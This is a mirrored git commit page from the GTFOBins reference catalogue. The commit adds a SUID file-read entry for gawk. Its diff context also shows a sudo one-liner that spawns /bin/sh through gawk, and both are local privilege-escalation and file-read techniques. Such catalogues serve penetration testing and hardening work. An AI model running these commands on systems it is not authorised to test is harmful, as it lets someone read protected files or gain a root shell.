mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Add SUID category to gawk as file read
This commit is contained in:
parent
085e72a971
commit
31b69cfeed
@ -27,6 +27,10 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
gawk '//' "$LFILE"
|
gawk '//' "$LFILE"
|
||||||
|
suid:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
./gawk '//' "$LFILE"
|
||||||
sudo:
|
sudo:
|
||||||
- code: sudo gawk 'BEGIN {system("/bin/sh")}'
|
- code: sudo gawk 'BEGIN {system("/bin/sh")}'
|
||||||
limited-suid:
|
limited-suid:
|
||||||
|
Loading…
Reference in New Issue
Block a user